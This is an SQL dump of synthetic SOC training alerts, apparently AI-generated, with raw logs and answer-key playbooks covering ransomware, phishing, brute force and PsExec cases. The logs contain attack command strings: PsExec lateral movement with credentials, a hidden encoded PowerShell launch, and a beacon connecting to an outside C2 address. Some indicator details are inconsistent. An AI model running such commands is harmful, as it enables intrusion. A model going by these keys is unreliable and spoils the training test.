(679, 'Unauthorized Access Attempt via PSExec', 'critical', 'EDR', 'Detected unauthorized use of PSExec for lateral movement within the network, indicating a potential compromise of administrative credentials.', 'Lateral Movement', 'T1569', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T14:10:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.20.15\",\"dst_ip\":\"192.168.20.20\",\"username\":\"administrator\",\"hostname\":\"server-01\",\"command_line\":\"psexec \\\\\\\\192.168.20.20 -u administrator -p secret cmd.exe\"}', '2026-01-10 04:57:21', '2026-01-11 14:57:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.20.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Source IP of unauthorized PSExec execution\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.20.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Destination IP targeted for lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\192.168.20.20 -u administrator -p secret cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"PSExec command used for unauthorized access\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec with administrative credentials suggests lateral movement within the network.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS'),
(680, 'Innocuous User Activity Mistaken for Attack', 'low', 'SIEM', 'A legitimate user activity was flagged as suspicious due to unusual but authorized access patterns.', 'Credential Attack', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T15:00:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"192.168.30.5\",\"dst_ip\":\"192.168.30.10\",\"username\":\"jane.doe\",\"hostname\":\"desktop-01\",\"request_body\":\"\"}', '2026-01-09 22:30:49', '2026-01-11 14:57:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.30.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Legitimate internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jane.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"User Management System\",\"verdict\":\"clean\",\"details\":\"Authorized user with legitimate access\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The activity was flagged due to unusual login patterns but was found to be legitimate upon review.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS'),
(681, 'Phishing Email Detected with Clean URL', 'medium', 'Email Gateway', 'A phishing email was detected; however, the URL was verified as clean after further analysis.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:40:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.0.2.10\",\"dst_ip\":\"192.168.5.10\",\"username\":\"mjohnson\",\"hostname\":\"mail-server\",\"email_sender\":\"info@securemail.com\",\"url\":\"http://legitimate-site.com\"}', '2026-01-10 17:07:54', '2026-01-11 14:57:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"info@securemail.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email address associated with previous phishing attempts\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://legitimate-site.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"URL verified as legitimate\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email was initially flagged due to the sender\'s history, but the URL was found to be legitimate.\"}', 'Expert', 'NDR', 9, 1, 'GOVERNMENT'),
(682, 'DNS Query to Benign Domain Mistaken for DGA', 'low', 'Firewall', 'A DNS query was flagged for potential DGA activity, but the domain was verified as part of legitimate testing activity.', 'Malware', 'T1568', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:00:00Z\",\"event_type\":\"dns_query\",\"src_ip\":\"192.168.40.5\",\"dst_ip\":\"192.168.40.5\",\"username\":\"qauser\",\"hostname\":\"test-machine\",\"domain\":\"test-domain-1234.com\"}', '2026-01-11 07:40:24', '2026-01-11 14:57:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"test-domain-1234.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Domain used for internal testing purposes\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.40.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"IP address of a test machine\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The domain was mistaken for a DGA domain but is used for legitimate testing.\"}', 'Expert', 'MAL', 9, 1, 'OT_ICS'),
(683, 'LockBit 3.0 Ransomware Detected via Cobalt Strike Beacon', 'critical', 'CrowdStrike', 'A Cobalt Strike Beacon associated with LockBit 3.0 ransomware was detected communicating with a known malicious IP. Indicators show initial access was achieved via compromised RDP credentials.', 'Malware', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:45:21Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"CORP-SERVER01\",\"command_line\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k netsvcs\",\"file_hash\":\"3c8a3f7d8f9f4b3a4e8d7c9b5e9f2d1f\"}', '2026-01-10 04:57:56', '2026-01-11 14:59:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 activities associated with ransomware\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3c8a3f7d8f9f4b3a4e8d7c9b5e9f2d1f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a Cobalt Strike payload\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised machine\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Cobalt Strike beacon activity detected from internal server communicating with known ransomware-associated IP.\"}', 'Expert', 'EDR', 9, 1, 'GOVERNMENT'),
(684, 'Suspicious Email Detected - Potential Phishing', 'high', 'Proofpoint', 'An email purporting to be from a trusted source contained a link to a known phishing domain. The email was flagged due to domain spoofing and suspicious attachments.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:30:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.25\",\"username\":\"asanchez\",\"hostname\":\"USER-LAPTOP02\",\"email_sender\":\"no-reply@trustedsource.com\",\"url\":\"http://phishing-link.example.com\"}', '2026-01-10 12:47:27', '2026-01-11 14:59:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"no-reply@trustedsource.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email domain does not match known trusted sources\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://phishing-link.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Known phishing domain targeting financial credentials\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 120 times for sending phishing emails\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Email contained a link to a known phishing domain and originated from a suspicious IP.\"}', 'Expert', 'NDR', 9, 1, 'FINANCE'),
(685, 'False Positive: Unusual Network Scanning Activity', 'medium', 'Wazuh', 'A network scanning tool was detected running on an internal server. Analysis revealed it was part of a scheduled vulnerability assessment.', 'Network Activity', 'T1046', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T07:15:33Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.30\",\"dst_ip\":\"10.0.0.50\",\"username\":\"admin\",\"hostname\":\"INTERNAL-SCAN01\",\"command_line\":\"nmap -sV 10.0.0.50\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-11 12:38:44', '2026-01-11 14:59:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"nmap -sV 10.0.0.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command execution aligns with scheduled vulnerability scanning\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of authorized scanner\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of scanned server\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_activity\",\"analysis_notes\":\"The activity corresponds to an authorized vulnerability scan and is not malicious.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS'),
(686, 'BlackCat/ALPHV Ransomware Pre-Encryption Reconnaissance Detected', 'critical', 'Splunk', 'Pre-encryption reconnaissance activities linked to the BlackCat/ALPHV ransomware group were detected. Attackers used PsExec for lateral movement within the network.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:05:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"10.0.0.45\",\"username\":\"administrator\",\"hostname\":\"CORP-SERVER01\",\"command_line\":\"PsExec.exe \\\\\\\\10.0.0.45 -u administrator -p password cmd.exe\"}', '2026-01-10 02:32:48', '2026-01-11 14:59:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"PsExec.exe \\\\\\\\10.0.0.45 -u administrator -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"PsExec usage consistent with lateral movement by ransomware groups\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised machine\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of target machine\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PsExec detected being used for lateral movement indicative of ransomware pre-encryption reconnaissance.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS'),
(687, 'Brute Force Attack Detected on RDP Service', 'high', 'Wazuh', 'Multiple failed login attempts detected from an external IP address targeting the RDP service on the network. The source IP is associated with known malicious activity.', 'Credential Attack', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:15:24Z\",\"event_type\":\"login_failure\",\"src_ip\":\"185.92.26.102\",\"dst_ip\":\"192.168.1.10\",\"username\":\"administrator\",\"hostname\":\"corp-server-01\",\"failed_attempts\":35}', '2026-01-11 02:30:22', '2026-01-11 15:02:20', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.26.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Common username for administrative access\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP has a high number of reports related to brute force activity, confirming this is a legitimate attack.\"}', 'Novice', 'SIEM', 1, 1, 'GOVERNMENT'),
(688, 'Malware Detected - LockBit 3.0 Ransomware', 'critical', 'CrowdStrike', 'A known ransomware file associated with LockBit 3.0 was executed on a corporate workstation. The file hash matches a known malicious signature.', 'Malware', 'T1486', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:37:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"hostname\":\"workstation-05\",\"command_line\":\"C:\\\\Users\\\\User\\\\Downloads\\\\ransom.exe\",\"file_hash\":\"f2d2c3e2345fabc1234567890defabc1234567890abcd1234567890efab1234c\"}', '2026-01-10 08:45:54', '2026-01-11 15:02:20', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"f2d2c3e2345fabc1234567890defabc1234567890abcd1234567890efab1234c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by 55 antivirus engines as LockBit 3.0 ransomware\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Users\\\\User\\\\Downloads\\\\ransom.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable associated with ransomware deployment\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash is confirmed malicious with a high detection rate on VirusTotal, indicating a true positive ransomware attack.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS'),
(689, 'Phishing Email Containing Malicious URL', 'medium', 'Proofpoint', 'A phishing email purporting to be from a legitimate service was received by a user. The email contains a URL leading to a fake login page.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:22:10Z\",\"event_type\":\"email_received\",\"email_sender\":\"no-reply@secure-login.com\",\"username\":\"jdoe\",\"hostname\":\"mailserver-01\",\"url\":\"http://malicious-login.com/login\"}', '2026-01-09 23:23:58', '2026-01-11 15:02:20', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"no-reply@secure-login.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Email sender domain detected in phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-login.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL leads to a phishing page attempting to steal credentials\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"block_url\",\"warn_user\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The URL in the email is confirmed malicious and is a known phishing site attempting to harvest credentials.\"}', 'Novice', 'SIEM', 1, 1, 'OT_ICS'),
(690, 'Suspicious Network Connection from Internal System', 'low', 'Firewall', 'A network connection was observed from an internal system to an external IP address. The connection was flagged due to unusual activity patterns.', 'Network Anomaly', 'N/A', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:02:33Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.25\",\"dst_ip\":\"203.0.113.55\",\"hostname\":\"workstation-12\"}', '2026-01-10 14:41:41', '2026-01-11 15:02:20', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No known malicious activity associated with this IP\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_anomaly\",\"analysis_notes\":\"The external IP has no malicious activity reports, indicating this is likely benign activity.\"}', 'Novice', 'NDR', 1, 1, 'GOVERNMENT'),
(691, 'Ransomware Attack Detected via Cobalt Strike Beacon', 'critical', 'CrowdStrike', 'A Cobalt Strike beacon was detected on the network, originating from an external IP address known for malicious activity. The beacon was executed on a compromised internal machine, indicating potential ransomware deployment.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T14:23:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.25\",\"username\":\"jdoe\",\"hostname\":\"CORP-WS-123\",\"command_line\":\"C:\\\\Program Files\\\\Common Files\\\\cs.exe -connect 203.0.113.45:443\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-09 17:36:25', '2026-01-11 15:03:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for hosting Cobalt Strike C2 servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised machine.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Cobalt Strike payloads.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a Cobalt Strike beacon indicates an active attempt to deploy ransomware, necessitating immediate remediation.\"}', 'Beginner', 'EDR', 3, 1, 'OT_ICS'),
(692, 'Suspicious Login Attempts Detected from Foreign IP', 'high', 'Wazuh', 'Multiple failed login attempts were detected from an IP address located in a region with no known business operations. This could indicate a potential brute force attack.', 'Brute Force', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:15:30Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.0.2.77\",\"username\":\"admin\",\"hostname\":\"CORP-SERVER-01\",\"failed_attempts\":25}', '2026-01-09 16:58:08', '2026-01-11 15:03:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP frequently reported for login brute force attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Commonly targeted username for brute force attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hostname\",\"value\":\"CORP-SERVER-01\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal server targeted by brute force attempts.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The repeated failed login attempts from a suspicious IP address suggest a brute force attack.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS'),
(693, 'Phishing Email with Malicious URL Detected', 'medium', 'Proofpoint', 'A phishing email was detected containing a malicious URL intended to harvest user credentials. The email was sent from a spoofed domain mimicking a trusted partner.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:45:20Z\",\"event_type\":\"email_received\",\"email_sender\":\"alerts@trusted-partner.com\",\"username\":\"asmith\",\"malicious_url\":\"http://malicious-url.com/login\"}', '2026-01-09 20:28:49', '2026-01-11 15:03:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"alerts@trusted-partner.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"suspicious\",\"details\":\"Email domain appears to be spoofed.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-url.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL known for phishing attempts.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"asmith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal user targeted by phishing attempt.\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The malicious URL and spoofed domain indicate a phishing attempt to steal user credentials.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS'),
(694, 'Failed RDP Access from Known Safe IP', 'low', 'Firewall', 'A failed RDP access attempt was logged from an IP address previously whitelisted for remote connections. The activity appears to be benign.', 'Brute Force', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T12:30:50Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"username\":\"mnguyen\",\"hostname\":\"CORP-RDP-SERVER\",\"failed_attempts\":3}', '2026-01-10 16:12:35', '2026-01-11 15:03:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Review\",\"verdict\":\"clean\",\"details\":\"IP address is whitelisted for remote access.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"mnguyen\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"User confirmed to have attempted RDP login.\"}},{\"id\":\"artifact_3\",\"type\":\"hostname\",\"value\":\"CORP-RDP-SERVER\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"RDP server receiving authorized connection attempts.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The source IP is whitelisted, indicating the failed login attempts are likely a result of user error rather than malicious intent.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS');
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES
(695, 'LockBit Ransomware Detected via Cobalt Strike Beacon', 'critical', 'CrowdStrike', 'A Cobalt Strike beacon was detected communicating with a known LockBit ransomware command and control server. The affected machine is showing signs of ransomware infection.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T03:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.15.23\",\"dst_ip\":\"185.199.110.153\",\"username\":\"jdoe\",\"hostname\":\"CORP-WKSTN-45\",\"command_line\":\"powershell.exe -nop -w hidden -enc aW5mbw==\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-10 03:14:01', '2026-01-11 15:04:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.110.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP reported 1203 times for C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.15.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -nop -w hidden -enc aW5mbw==\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicating potential malicious activity\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File hash associated with LockBit ransomware\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a Cobalt Strike beacon and known ransomware file hash confirms the infection.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS'),
(696, 'Suspicious RDP Login Attempts Detected', 'high', 'Wazuh', 'Multiple failed RDP login attempts detected from an external IP address. The attempts indicate a potential brute force attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:15:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"RDP-SERVER\",\"failed_attempts\":37}', '2026-01-09 18:53:30', '2026-01-11 15:04:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of target server\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The high number of failed login attempts from a foreign IP suggests a brute force attack.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS'),
(697, 'ALPHV Ransomware Reconnaissance Activity Detected', 'medium', 'Splunk', 'Suspicious use of PsExec detected, indicating potential lateral movement associated with ALPHV ransomware.', 'Lateral Movement', 'T1077', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T02:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.12\",\"dst_ip\":\"10.0.0.23\",\"username\":\"svc_admin\",\"hostname\":\"CORP-SERVER-01\",\"command_line\":\"psexec.exe \\\\\\\\10.0.0.23 -u admin -p password123 cmd.exe\"}', '2026-01-11 13:49:48', '2026-01-11 15:04:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Source IP involved in lateral movement\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Destination IP involved in lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\10.0.0.23 -u admin -p password123 cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"PsExec usage for lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PsExec is commonly used for lateral movement, especially in ransomware operations.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS'),
